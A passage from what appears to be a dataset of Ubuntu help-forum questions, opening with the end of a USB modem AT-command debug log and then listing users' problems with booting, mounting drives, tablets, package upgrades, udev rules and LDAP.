5 ... .ok.. tue 2013/10/15 09:56:04 : memory info received tue 2013/10/15 09:56:04 : parsing +cpbr : ( 1-100 ) ,24,255 with +cpbr : ( @ i- @ i ) , @ i , @ i tue 2013/10/15 09:56:04 : parsed int 1 tue 2013/10/15 09:56:04 : parsed int 100 tue 2013/10/15 09:56:04 : parsed int 24 tue 2013/10/15 09:56:04 : parsed int 255 tue 2013/10/15 09:56:04 : leaving gsm_getmemorystatus tue 2013/10/15 09:56:08 : entering gsm_dialvoice tue 2013/10/15 09:56:08 : making voice call tue 2013/10/15 09:56:08 : sending frametype 0x00/length 0x10/16 tue 2013/10/15 09:56:08 : 41a|54t|44d|54t|300|377|377|355|311|355|399|366|355|311|3b ; |0d atdt0775159651 ; . tue 2013/10/15 09:56:08 : 1 `` atdt0775159651 ; '' tue 2013/10/15 09:56:08 : 2 `` ok '' tue 2013/10/15 09:56:08 : checking line : ok tue 2013/10/15 09:56:08 : at reply state : 1 tue 2013/10/15 09:56:08 : received frametype 0x00/length 0x16/22 tue 2013/10/15 09:56:08 : 41a|54t|44d|54t|300|377|377|355|311|355|399|366|355|311|3b ; |0d atdt0775159651 ; . tue 2013/10/15 09:56:08 : 0d |0a |4fo|4bk|0d |0a ..ok.. tue 2013/10/15 09:56:08 : dial voice ok tue 2013/10/15 09:56:08 : leaving gsm_dialvoice tue 2013/10/15 09:56:08 : entering gsm_getsignalquality tue 2013/10/15 09:56:08 : getting signal quality info tue 2013/10/15 09:56:08 : sending frametype 0x00/length 0x07/7 tue 2013/10/15 09:56:08 : 41a|54t|2b+|43c|53s|51q|0d at+csq . tue 2013/10/15 09:56:08 : 1 `` at+csq '' tue 2013/10/15 09:56:08 : 2 `` +csq : 15,99 '' tue 2013/10/15 09:56:08 : 3 `` ok '' tue 2013/10/15 09:56:08 : checking line : ok tue 2013/10/15 09:56:08 : at reply state : 1 tue 2013/10/15 09:56:08 : received frametype 0x00/length 0x1c/28 tue 2013/10/15 09:56:08 : 41a|54t|2b+|43c|53s|51q|0d |0d |0a |2b+|43c|53s|51q|3a : |20 |311 at+csq ... +csq : 1 tue 2013/10/15 09:56:08 : 355|2c , |399|399|0d |0a |0d |0a |4fo|4bk|0d |0a 5,99 ... .ok.. tue 2013/10/15 09:56:08 : signal quality info received tue 2013/10/15 09:56:08 : parsing +csq : 15,99 with +csq : @ i , @ i tue 2013/10/15 09:56:08 : parsed int 15 tue 2013/10/15 09:56:08 : parsed int 99 tue 2013/10/15 09:56:08 : leaving gsm_getsignalquality tue 2013/10/15 09:56:08 : entering gsm_getbatterycharge tue 2013/10/15 09:56:08 : getting battery charge tue 2013/10/15 09:56:08 : sending frametype 0x00/length 0x07/7 tue 2013/10/15 09:56:08 : 41a|54t|2b+|43c|42b|43c|0d at+cbc . tue 2013/10/15 09:56:08 : 1 `` at+cbc '' tue 2013/10/15 09:56:08 : 2 `` +cbc : 2,0 '' tue 2013/10/15 09:56:08 : 3 `` ok '' tue 2013/10/15 09:56:08 : checking line : ok tue 2013/10/15 09:56:08 : at reply state : 1 tue 2013/10/15 09:56:08 : received frametype 0x00/length 0x1a/26 tue 2013/10/15 09:56:08 : 41a|54t|2b+|43c|42b|43c|0d |0d |0a |2b+|43c|42b|43c|3a : |20 |322 at+cbc ... +cbc : 2 tue 2013/10/15 09:56:08 : 2c , |300|0d |0a |0d |0a |4fo|4bk|0d |0a ,0 ... .ok.. tue 2013/10/15 09:56:08 : battery level received tue 2013/10/15 09:56:08 : parsing +cbc : 2,0 with +cbc : @ i , @ i tue 2013/10/15 09:56:08 : parsed int 2 tue 2013/10/15 09:56:08 : parsed int 0 tue 2013/10/15 09:56:08 : leaving gsm_getbatterycharge tue 2013/10/15 09:56:08 : entering gsm_getdatetime tue 2013/10/15 09:56:08 : getting date & time tue 2013/10/15 09:56:08 : sending frametype 0x00/length 0x09/9 tue 2013/10/15 09:56:08 : 41a|54t|2b+|43c|43c|4cl|4bk|3f ? |0d at+cclk ? . tue 2013/10/15 09:56:08 : 1 `` at+cclk ? '' tue 2013/10/15 09:56:08 : 2 `` +cclk : 2013/10/15,09:56:08 '' tue 2013/10/15 09:56:08 : 3 `` ok '' tue 2013/10/15 09:56:08 : checking line : ok tue 2013/10/15 09:56:08 : at reply state : 1 tue 2013/10/15 09:56:08 : received frametype 0x00/length 0x2d/45 tue 2013/10/15 09:56:08 : 41a|54t|2b+|43c|43c|4cl|4bk|3f ? |0d |0d |0a |2b+|43c|43c|4cl|4bk at+cclk ? ... +cclk tue 2013/10/15 09:56:08 : 3a : |20 |322|300|311|333|2f/|311|300|2f/|311|355|2c , |300|399|3a : : 2013/10/15,09 : tue 2013/10/15 09:56:08 : 355|366|3a : |300|388|0d |0a |0d |0a |4fo|4bk|0d |0a 56:08 ... .ok.. tue 2013/10/15 09:56:08 : parsing +cclk : 2013/10/15,09:56:08 with +cclk : @ d tue 2013/10/15 09:56:08 : grabbed string from reply : `` 2013/10/15 '' ( parsed 10 bytes ) tue 2013/10/15 09:56:08 : grabbed string from reply : `` 09:56:08 '' ( parsed 8 bytes ) tue 2013/10/15 09:56:08 : parsed string for date `` 2013/10/15,09:56:08 '' tue 2013/10/15 09:56:08 : parsed date : 2013-10-15 9:56:8 , tz 0 tue 2013/10/15 09:56:08 : leaving gsm_getdatetime result of lsusb ( last line is the particular device ) : dumindumahawela @ dumindumahawela : ~ $ lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 10f1:1a34 importek bus 002 device 003 : id 12d1:1001 huawei technologies co. , ltd. e169/e620/e800 hsdpa modem
359811	mount accidentally disconected cdrom	i had a dvd drive and a external hard drive connected to my pc and i 've disconnected them accidentally . now i 've already spent hours trying to access them , mount , umount and ca n't figure how to connect the devices again . ca n't believe how such a simple thing can be such a headache in linux i can see the directory where the devices were mounted previously , but a there is nothing inside them . can anyone help me out ? i 'm new to linux and i 'm finding this very frustrating at the moment . thanks ,
359813	dconf changes does not work , or database is not updating	in my company we use nomachine as a remote desktop solution for all employees , and ubuntu is the distro used . we control the posibilities for the users through dconf ( including locks ) but i have a problem . i 've been making some changes lately that does not work . i do not know what is causing the problem . i added several entries , but only the first entry ( the one i made from the start ) works.. my /etc/dconf/db/local.d/settings file looks like this : [ org/gnome/nautilus/desktop ] volumes-visible=true [ org/gnome/nautilus/desktop ] network-icon-visible=true [ org/gnome/nautilus/desktop ] home-icon-visible=false [ org/gnome/nautilus/preferences ] sort-directories-first=true [ org/gnome/nautilus/preferences ] show-hidden-files=true only the first entry works . i did of course update the dconf database ( dconf update ) after the changes , but the changes does not have any effect .
359815	unwanted graphic file in dash	why do .jpg files appear in dash home after being downloaded ? after i download a photograph , it automatically appears in dash under recent files
359821	installing finger on ubuntu	while executing finger command it is showing e : unable to locate finger package..i do n't know how to get this package.help me to solve this .
359824	where are the files downloaded to when using `apt-get download` command ?	i want to know the storage location of sudo apt-get download command in ubuntu . i searched in the archives folder but its not there . please help me .
359830	android ubuntu xperia z running 4.2.2 android	i am interested in ubuntu for android i have a sony xperia z running version 4.2.2 of android how would i download the ubuntu software for my phone
359831	ca n't boot or install ubuntu	made a flash-able usb-stick with ubuntu 13.04 on it . when i try to boot without installation or when i try to install it , i get into the gnu-grub menu , but not into the normal ubuntu menu . if i choose one of those i get a black screen . after waiting for 30 minutes i 've shut down my pc . i tried it several times , re-downloaded ubuntu but nothing helps . i 've read about the nomodeset option , but i do n't even have those menu . if it helps : i have an asus n56vz ( notebook ) with windows 8 , intel i7 3630qm , a nvidia geforce gt650m , 8gb ram and a partitioned hdd , on which both partitions have more than 100gb of free memory . and the fastboot mode of windows 8 is also disabled . please help me , thanks in advance .
359833	ubuntu does n't boot after installation .	my ubuntu does n't boot . firstly i installed it using wubi , but then i decided to delete it for some reason . however , after installation using a livecd , with three partitions , it does n't boot . still , it works with livecd , and i downloaded boot-repair , which did n't help at all . also , in a livecd mode i ca n't save anything , after restart , all changes are in default .
359835	hdmi working at boot but then blank once i log in	i 've been having issues with hdmi output . running ubuntu 12.04 on a lenovo z580 , ubuntu registers the hdmi and i have image and sound up to logging in then once i log in it goes blank . when i log in it looses the connection to the screen . i 've updated my nvidia drivers . i 've gone into display settings and request my benq screen to turn on , after clicking apply i get this error : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr then when i shutdown the hdmi screen turns on again for shutdown . e2a : when i log in it looses the connection to the screen
359836	can not download videos on ubuntu 12.04 using youtube-dl	i wanted to download this particular video of david archuleta - crush and i can not seem to download it . i tried updating , reinstalling the application using the terminal but still can not download the video . the problem with it is i can not download it from any video service like vimeo or youtube . i tried with youtube , also got the available formats but failed to download the video . here 's the link of the video please someone tell me if its the video problem or the application problem ?
359837	unable to calculate upgrade from 13.04 to 13.10	i 'm getting that error message when i try to upgrade . i 've removed all ppa i do not need , next i 've started looking into grep broken /var/log/dist-upgrade/apt.log but the list is huge and i do not want to break my system removing something that might be needed , here are all the packages listed there activity-log-manager : amd64 apache2.2-bin : amd64 apache2-bin : amd64 apache2-bin : amd64 cups-filters : amd64 gnome-session-flashback : amd64 libaccount-plugin-generic-oauth : amd64 libaccount-plugin-generic-oauth : amd64 libbamf3-1 : amd64 libgtksourceview-3.0-0 : amd64 libharfbuzz0a : amd64 libharfbuzz0a : amd64 libpam-systemd : amd64 libreoffice-common : amd64 libsnmp30 : amd64 libunity-core-6.0-5 : amd64 libunity-core-6.0-8 : amd64 libunity-scopes-json-def-desktop : amd64 libunity-scopes-json-def-desktop : amd64 libwayland-client0 : amd64 python3-aptdaemon.pkcompat : amd64 python3-uno : amd64 texlive-base : amd64 texlive-base : amd64 unity : amd64 unity-gtk2-module : amd64 unity-gtk3-module : amd64 unity-scope-home : amd64 how do i know which is the offending one ? do i have to remove them all ? any help or hint would be greatly appreciated , thanks .
359842	issues with boot	im not to sure if it is an issue with boot , but recently i installed ubuntu with xfce onto my msi u120 , it ran windows 7 happily but as i got a new personal computer i decided to use my msi for work so every time i turn the laptop on after the installation , it boots up perfectly but once i am on the main window , the screen dims and the laptop becomes almost completely unresponsive , i have logged onto it with another linux computer to install xfce due to th fact that is was designed to use as little resources as possible but this didnt change anything i have tried everything including disabling hardware that i thought may be messing with settings , such as the auto brightness function and even the track pad but nothing the hard drive is running perfetly and i have already reinstalled but its the same issue is there anyone who can offer suggestions as to what i can do ?
359844	tap network driver version	using ubuntu 12.04.2 lts command line ( server version ) how can i determine the versions of device drivers installed specifically i would like to know the version of tap network device driver . thanks
359845	installing ubuntu from freedos	is it possible to install ubuntu from freedos ? the machine does not have an optical drive , so i 'm assuming i 'll be able to install via memory stick . if so , what are the system requirements ? thanks ! chris
359853	hi.. i had the blue screen of death and installed ubuntu test from my sons disk	i would like to erase windows 7 from my laptop asus core i7 . i do not care about the programs nor info on the hard drive , i have it all backed up.. please help as i am running on a cd and when i close computer everything that i love and saved in ubuntu is lost . i do not have the 4.4 gb to install ubuntu : ( what do i do ? ? please this is how far i got.. if it even right.. i 'm so new at this ubuntu @ ubuntu : ~ $ df -h filesystem size used avail use % mounted on /cow 2.9g 198m 2.7g 7 % / udev 2.9g 4.0k 2.9g 1 % /dev tmpfs 1.2g 864k 1.2g 1 % /run /dev/sr0 763m 763m 0 100 % /cdrom /dev/loop0 717m 717m 0 100 % /rofs tmpfs 2.9g 7.0m 2.9g 1 % /tmp none 5.0m 4.0k 5.0m 1 % /run/lock none 2.9g 208k 2.9g 1 % /run/shm none 100m 56k 100m 1 % /run/user ubuntu @ ubuntu : ~ $ cd /dev/ ubuntu @ ubuntu : /dev $ ls alarm loop5 rfkill tty28 tty6 ttys4 ashmem loop6 rtc tty29 tty60 ttys5 autofs loop7 rtc0 tty3 tty61 ttys6 binder loop-control sda tty30 tty62 ttys7 block mapper sg0 tty31 tty63 ttys8 bsg mcelog sg1 tty32 tty7 ttys9 btrfs-control mei shm tty33 tty8 uinput bus mem snapshot tty34 tty9 urandom cdrom net snd tty35 ttyprintk v4l cdrw network_latency sr0 tty36 ttys0 vcs char network_throughput stderr tty37 ttys1 vcs1 console null stdin tty38 ttys10 vcs2 core oldmem stdout tty39 ttys11 vcs3 cpu port tty tty4 ttys12 vcs4 cpu_dma_latency ppp tty0 tty40 ttys13 vcs5 disk psaux tty1 tty41 ttys14 vcs6 dri ptmx tty10 tty42 ttys15 vcs7 dvd pts tty11 tty43 ttys16 vcsa dvdrw ram0 tty12 tty44 ttys17 vcsa1 ecryptfs ram1 tty13 tty45 ttys18 vcsa2 fb0 ram10 tty14 tty46 ttys19 vcsa3 fd ram11 tty15 tty47 ttys2 vcsa4 full ram12 tty16 tty48 ttys20 vcsa5 fuse ram13 tty17 tty49 ttys21 vcsa6 hidraw0 ram14 tty18 tty5 ttys22 vcsa7 hpet ram15 tty19 tty50 ttys23 vga_arbiter input ram2 tty2 tty51 ttys24 vhost-net kmsg ram3 tty20 tty52 ttys25 video0 kvm ram4 tty21 tty53 ttys26 video1 log ram5 tty22 tty54 ttys27 zero loop0 ram6 tty23 tty55 ttys28 loop1 ram7 tty24 tty56 ttys29 loop2 ram8 tty25 tty57 ttys3 loop3 ram9 tty26 tty58 ttys30 loop4 random tty27 tty59 ttys31
359855	how to detect insertion of dvd disc ?	in particular , how to catch it for the purposes of automounting the dvd filesystem ? update in response to oli 's answer : udev seems to be able to detect the insertion of dvd , as demonstrated by changes in udevadm 's output before and after the event : % udevadm info -q env -n /dev/cdrom which results in additional environment variables as follows : id_cdrom_media=1 id_cdrom_media_dvd=1 id_cdrom_media_session_count=1 id_cdrom_media_state=complete id_cdrom_media_track_count=1 id_cdrom_media_track_count_data=1 id_fs_label=20130926_backup id_fs_label_enc=20130926_backup id_fs_type=udf id_fs_usage=filesystem however , when i tried the following udev rule ( which tries to detect id_fs_type== '' udf '' ) , subsystem== '' block '' , env { id_cdrom } == '' ? * '' , env { id_fs_type } == '' udf '' , env { id_path } == '' pci-0000:00:1f.2-scsi-0:0:0:0 '' , action== '' add '' , run+= '' /bin/mount -t udf -o ro /dev/cdrom /var/run/usbmount/dvdrom '' it does n't work . what could be the problem ? solution was finally able to solve this thanks to oli 's suggestions : /etc/udev/rules.d/autodvd.rules : subsystem== '' block '' , env { id_cdrom } == '' ? * '' , env { id_path } == '' pci-0000:00:1f.2-scsi-0:0:0:0 '' , action== '' change '' , run+= '' /usr/local/bin/autodvd '' /usr/local/bin/autodvd : # ! /bin/bash { if [ $ id_cdrom_media -eq 1 ] ; then mkdir -p /var/run/usbmount/dvdrom mount -t $ id_fs_type -o ro /dev/cdrom /var/run/usbmount/dvdrom else umount -l /var/run/usbmount/dvdrom rm -rf /var/run/usbmount/dvdrom fi } & > > `` /var/log/autodvd.log '' & apparently action== '' add '' is n't triggered when dvd disc is inserted . so instead , we use action== '' change '' and then detect the insert or eject event via scripting .
359856	share wireless internet connection through ethernet	i want to share the wireless internet connection on my desktop with my old laptop , through ethernet . i have ticked the option `` make available to others '' on both connections , on my desktop , but my laptop does n't connect . am i doing something wrong or is it a bug ?
359860	error `` configure : error : glib > = 2.28 is required '' while configuring bluez stack	i was configuring the latest bluez stack on my machine ( 13.04 64-bit ) . i got following error while configuring it : checking for glib ... no configure : error : glib > = 2.28 is required can someone help here with the error , how to resolve it and configure bluez ?
359861	converting all .sub to .srt with framerate	i wa n't to convert all .sub ( microdvd and subrip ) to .srt ( subviewer ) format that my player uses . i made this little bash script that searches for the filenames starting with given keyword and uses mediainfo to get the proper framerate from videofile with the same name as the .sub file . any suggestions for improvements ? # ! /bin/bash otherfiles= ( sub srt txt ) for f in $ ( find -maxdepth 1 -type f -name $ @ '* ' ) do if [ [ $ { otherfiles [ * ] } =~ $ { f # # * . } ] ] ; then : else name= $ { f % . * } if [ -f $ { name } .sub ] ; then echo `` movie : $ { f } '' fps=`mediainfo -- inform=video\ ; % framerate % `` $ { f } '' ` if echo `` $ fps '' | grep '^ [ 0-9 ] ' > /dev/null ; then echo `` fps : $ { fps } '' echo `` sub : $ { name } .sub '' sub2srt -f= $ { fps } $ { name } .sub else echo `` not working movie-file ! '' fi echo `` '' fi fi done
359862	steam glx opengl is not directly rendering	my steam seems to suddenly not work . i 've tried everything ( i did n't reinstall drivers , 'cause after i messed up my friend 's computer i 'm scared to do that on my computer ) . skype fix method is not working , as i get a message in terminal : error : ld.so : object '/usr/lib/i386-linux-gnu/mesa/libgl.so.1 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/usr/lib/i386-linux-gnu/mesa/libgl.so.1 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/usr/lib/i386-linux-gnu/mesa/libgl.so.1 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/usr/lib/i386-linux-gnu/mesa/libgl.so.1 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/usr/lib/i386-linux-gnu/mesa/libgl.so.1 ' from ld_preload can not be preloaded : ignored . unknown steam package 'steam-bin' nothing works for me , direct rendering is on as glxinfo says about it . also my drivers are all good working . any ideas ?
359864	can not install icaclient due to problem with ia32-libs	finally , citrix released a new version and ubuntu updated their guide here ( apparently , it were the dependecy changes as we found out ) . it should work now kind of out of the box . i have a problem installing the package icaclient on 13.10 saucy salamander 64bit . it seems that there is a problem with ia32-libs and other dependencies . marc @ pinballwizard : ~ $ sudo dpkg -i downloads/icaclient_12.1.0_amd64.deb [ sudo ] password for marc : selecting previously unselected package icaclient . ( reading database ... 179461 files and directories currently installed . ) unpacking icaclient ( from ... /icaclient_12.1.0_amd64.deb ) ... dpkg : dependency problems prevent configuration of icaclient : icaclient depends on ia32-libs ; however : package ia32-libs is not installed . icaclient depends on lib32z1 ; however : package lib32z1 is not installed . icaclient depends on lib32asound2 ; however : package lib32asound2 is not installed . dpkg : error processing icaclient ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : icaclient hence , other workarounds seem not to work . i followed the instructions here - and for the last two ubuntu releases it was surely no problem . when i try to install ia32-libs i get the following issue : marc @ pinballwizard : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate is there any possibility to install icaclient ? the sources.list is here .
359867	find does not work with my variable	i 'm trying to find the number of dirs and files in a given dir . i 'm running my bash script like this : archive=/path/to/archive ./myscript in my script i am doing this : # find the number of non-empty directories in the given dir dirs= $ ( find $ archive -mindepth 1 -maxdepth 1 -not -empty -type d | wc -l ) # find the number of files in the given dir msgs= $ ( find $ archive -type f | wc -l ) echo `` number of directories : $ dirs '' echo `` total number of messages : $ msgs '' this works great when i am running the script on a subset of the data i 'm looking at , which is located in a dir at the same level as the script . however , the actual data is in someone else 's directory and when i run it with the archive variable set to that location , both values return as 0 . i have a similar script that i use as well , and the find command there does not work on the second directory either . strangely enough , i use some egrep commands and they work just fine for both . why can i not use find in this manner ?
359869	unusally high ram usage by eset nod32 ( linux desktop )	recently , i 'd encountered unusally high ram usage on both my ubuntu 12.04 lts laptops ( 32-bit and 64-bit desktop os versions ) . i noticed that , immediately after system startup , eset will load 2 instances of esets_daemon in memory ( with normal priority ) as root user ion both laptops . here 's an example on the 32-bit os laptop after system startup : root 1190 0.0 11.6 73116 59376 ? ss 05:35 0:00 /opt/eset/esets/sbin/esets_daemon root 1192 1.5 12.0 109576 61344 ? sl 05:35 0:40 /opt/eset/esets/sbin/esets_daemon in the above example , eset has already used up 120 mb of ram on 1 laptop with 512 mb ram immediately after system startup . the situation is similar on the 64-bit os laptop . ( 2gb ram ) . i am not running any anti-virus scan when i encountered the unusally high ram usage . i can not stop any of the eset processes without causing a system freeze-up . here 's the current version for both systems ' linux nod32 anti-virus software : product version : 4.0.79.0 update module : 1043 ( 20130415 ) antivirus & antispyware scanner module : 1410 ( 20130926 ) virus signature database : 8924 ( 20131016 ) archive support module : 1180 ( 20130930 ) advanced heuristics module : 1143 ( 20130909 ) cleaner module : 1078 ( 20131003 ) linux kernel version : 3.8.0-31-generic ubuntu os : 12.04.3 lts i have already installed all the latest system updates ( including eset nod32 ) on both laptops but the unusually high ram usage after system startup still persists on both laptops . reformatting the harddisk and reinstalling the os from scratch on both laptops did not resolve the problem . how do i reduce the unusually high ram usage by eset nod32 on both my ubuntu laptops ? thanks in advance .
359877	in recovery mode , can not type in the terminal	so i have been having problems with my graphics card ( nvidia geforece gt 620 ) and ubuntu not reading it . i then booted into recovery mode to try and get any updates . upon clicking recovery mode , all of the recovery menu items ( resume , clean , dpkg , failsafex , fsck , grub , network , and system-summary ) all prompt me with error messages , continuing with remount you / filesystem in read/write mode and mount any other filesystem defined in /etc/fstab . do you wish to continue ? . when i hit yes , it will bring up a terminal at the bottom which i can type into but it does not return anything when i hit enter . when in i drop to root shell prompt from the grub , i can type in sudo apt-get install nvidia-update and get w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write /var/cache/apt/ e : the package lists or status file could not be parsed or opened when i boot normally , i get an error message that says `` the system is running in low-graphics mode . your screen , graphics card , and input device settings could not be detected correctly . you will need to configure them yourself . '' and the result of any of the options after that screen are a black screen with some writing already on it , and it will let me type but not accept any commands . what to do ?
359888	pdf 's images not at 100 % quality on libreoffice	when i export as pdf on libreoffice i 've got a poor image quality on all the images and all the documents i made . i 've checked the option `` loseless compression '' on the export preferences . i take the screenshots with shutter . also i have a friend who shows me a pdf exported like i 'm doing and their pdf looks awesome ...
359890	wacom cth480 not working on ubuntu 13.04	i have recently bought a wacom cth480 ( intuos pen and touch small ) ( i am using ubuntu 13.04 -- 64 bit ) the wacom graphics tablet application present under system settings is showing `` no tablet detected '' . lsusb detects the wacom device as connected , but xsetwacom -- list devices shows no output . the light ( white ) itself on the device glows when connected to the computer and other light ( blue ) glows when the stylus is brought near to the active area . the mouse pointer does not move when the stylus is moved over the active area on the tablet . i have visited some forums discussing the problems relating wacom tablets and the linux wacom project , but got nowhere on how to start troubleshooting the problem . any help will be greatly appreciated .
359892	why is my wacom intuos tablet not detected ?	i need a little help trying to install a wacom intuos tablet , model number ctl-480/s . my installation of ubuntu 13.04 , 64bit , does n't seem to be able to detect the device . i 've tried an few different usb ports on my machine and get the same result . i believe there is an issue because when i open the system settings app from the launcher and browse to the wacom tablet section under hardware , it reports that there is 'no table detected ' . when i use lsusb i can see the device is detected : bus 003 device 004 : id 056a:030e wacom co. , ltd i 've also pulled the following from the syslog : oct 16 16:51:05 earth kernel : [ 7062.388031 ] usb 3-5 : new full-speed usb device number 4 using ohci_hcd oct 16 16:51:05 earth kernel : [ 7062.611038 ] usb 3-5 : new usb device found , idvendor=056a , idproduct=030e oct 16 16:51:05 earth kernel : [ 7062.611042 ] usb 3-5 : new usb device strings : mfr=1 , product=2 , serialnumber=0 oct 16 16:51:05 earth kernel : [ 7062.611045 ] usb 3-5 : product : intuos ps oct 16 16:51:05 earth kernel : [ 7062.611047 ] usb 3-5 : manufacturer : wacom co. , ltd . oct 16 16:51:05 earth mtp-probe : checking bus 3 , device 4 : `` /sys/devices/pci0000:00/0000:00:02.0/usb3/3-5 '' oct 16 16:51:05 earth mtp-probe : bus : 3 , device : 4 was not an mtp device i 'd really appreciate any suggestions to help debug and install this device .
359895	what to do when my wubi install boots to a command line environment ?	i installed ubuntu with wubi.exe and i rebooted my computer . when booting , i chose ubuntu and entered my username and password . then i got to the terminal . what commands should i type in ?
359896	caffeine and chrome flash	i have xscreensaver and caffeine working fine for things i 've added to the list but the screensaver still comes up when watching youtube in fullscreen on chrome . i have the activate for flash box checked already and ca n't figure out how to fix that or what to add to the list . is there a way i can fix this or do i have to do it manually every time i watch a video ?
359897	12.04 lts 32bit or 64bit on dell sudio 15	i have a processor of 64bit and 3gb ram , which version of ubuntu 12.04 lts will be better & stable , 32 or 64 . dont know about uefi , if that is necessary ?
359898	why is ubuntu repeatedly asking me to upgrade ?	hello there i have recently downloaded ubuntu 12.04 and installed it alongside with my windows7 . after i finished my installation it asked me to upgrade and i upgraded but after that my ubuntu desktop became 12.10 . now again it asks me to upgrade to 13.04 . i am really confused cause as on the ubuntu download center it is stated that ubuntu 12.04 will have support till 2017 . what is really happening ? do i need to upgrade every time it asks me to upgrade or can i skip the upgrade . and what will happen to my first installed ubuntu 12.04 version ? will it have support till 2017 ? i am really a beginner with linux and ubuntu .
359899	hot to update ubuntu server packages with yum update ?	after booting and logging in , the message `` xx updates available , xx updates are security updates '' . i type yum update and i am informed that it needs to be installed ? yum is not installed as part of the base os ? why does the system not start in gui ? is this going to be fixed in next release ? server 12.x
359901	how can i install a steam game on a flash drive	i 'm wondering if i install garry 's mod on a flash drive ?
359903	ca n't access my hard drive	error mounting /dev/sda4 at /media/sahil/boot : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda4 '' `` /media/sahil/boot '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda4 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
359906	apt-get update not working getting 503 service unavailable	i am running with the below version on ubuntu . lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise i am having below issues when running apt-get update and so i have decided something is broken in the package manager and have re-installed the o/s , but still see the same issue . i am unable to figure out the issue and btw server is not running behind proxy . it used to work before , suddenly i am seeing these errors . apt-get update ign http : //security.ubuntu.com precise-security inrelease - - - w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages 503 service unavailable [ ip : 91.189.91.14 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
359911	reset sound drivers	i fix sound problem of skype with this solution : link ! but now is not the sound button in system tray . how to reset the actions of tutorial ?
359912	lost lockscreen after uninstalling cinnamon from 13.04 , how do i get it back ?	alright , i just received a cinnamon update ( presumably to cinnamon 2.0 ) and for some reason that update changed my lockscreen , even though i 'm using unity . i was n't using cinnamon anyway and wanted my unity lockscreen back ( the one that simply presents darkened wallpaper with a clock ) , so i uninstalled as much of cinnamon as i dared using software centre , then used synaptic to get rid of the bits of cinnamon ( cinnamon-desktop-data ect ) left behind . the trouble is that now , when i press ctrl+alt+l , nothing happens , as if the cinnamon lockscreen had overwritten the default unity locker , only to have both removed . how can i get my original lockscreen back ? cheers in advance !
359917	how do i delete specific attributes in ldap using ldap-utils command-line ?	i 'm trying to remove two attributes from ldap user . pseudo command : ldapdelete -d `` uid=username , attribute1 , attribute2 '' -w my_pass -h localhost how do i do that ? note : when searching i 'm using the following working command : ldapsearch -d `` cn=my-test , ou=services , dc=foo , dc=com '' -w my_pass -h localhost -b `` ou=non-enterprise , ou=people , dc=foo , dc=com '' -s sub -x -zz `` ( uid=username ) '' related : how do i delete one attribute in ldap with ldif ? sun java system directory server enterprise edition 6.0 administration guide examples on github
359918	move ubuntu server from 64gb sd to 16gb usb	i 'm tearing my hair out trying to figure this out . i 've recently built myself a home server to store and save all my media . i installed ubuntu server 12.04lts and setup a bunch of stuff on a 64gb sd card i had spare . i 've since bought a 16gb usb3 stick to take over the os so i can use the sd card again . i had assumed moving the os from drive to drive would be a fairly easy process ... first i learned that you ca n't easily clone from a large drive to a small one . the total os is only taking up 5gb of space at present , and even with a 3gb swap partition there 's still more than enough raw space on the 16gb drive . i tried using dd which just filled the usb with a 16gb ext4 partition then failed . i resized the ext4 partition on the sd card to 9gb and left the remaining space unpartitioned . tried dd again which just created another 16gb ext4 partition before complaining the drive was full . clonezilla also failed , i forget the exact error message but it was still complaining that it does n't have enough space on the destination drive ( this was after it had been formatted and was only copying the 9gb ext4 partition . so , suggestions please !
359919	fresh install of ubuntu 13.04 trying to use dosbox but ca n't get past the first step	from https : //help.ubuntu.com/community/dosbox the first thing i try is : in a regular terminal , ( not dosbox ) , you can execute mkdir ~/dos/c which will create the /dos/c directory in your home directory . i can not do this very simple first step . i get error : can not create directory
359920	mounted webdav folder opens documents in read-only	i set up a webdav for my t-online-media center via davfs2 and the address via sudo mount -t davfs https : //webdav.mediencenter.t-online.de /home/marc/mediencenter in 13.10 saucy salamander 64bit . when i open any documents they are read-only . when i access the server via davs : //username @ webdav.mediencenter.t-online.de/ i am able to open and edit documents . but : i can not mount it with davfs2 . so is there a solution for ( permanentely ) mounting the folder and edit the files in it ? is there even another option maybe excluding webdav ?
359921	ubuntu 13.10 - network interface connection issue	i am using ubuntu version 13.10 beta 2 . when i load a kernel module i developed and try to connect ( or disconnect ) the ethernet interface from the unity system tray , the kernel shows an oops message . i.e . when the link is made 'up ' or 'down ' . however , my modules work fine with the beta1 version of ubuntu 13.10 . the modules are `` mymodule1 '' and `` mymodule2 '' i am planning to setup kgdb over serial ( kgdboc ) to troubleshoot the issue . but i am not sure this is the correct path i should follow . i am almost certain that the bug is in my code but i am not sure which path should i follow to troubleshoot the issue . could any one of you guide me how to troubleshoot this issue in any other way which is more elegant. ? thanks , binoy the kernel version is 3.11.0-8-generic kernel oops message : sep 25 13:42:20 sriram kernel : [ 71256.175334 ] r8169 0000:02:00.0 eth0 : link down sep 25 13:42:23 sriram kernel : [ 71260.026047 ] scanning file 8:7:1966101 : dhclient-a156a555-8021-46c8-80d8-e321e1fe20db-eth0.lease sep 25 13:42:23 sriram kernel : [ 71260.026064 ] bug : unable to handle kernel null pointer dereference at 0000000c sep 25 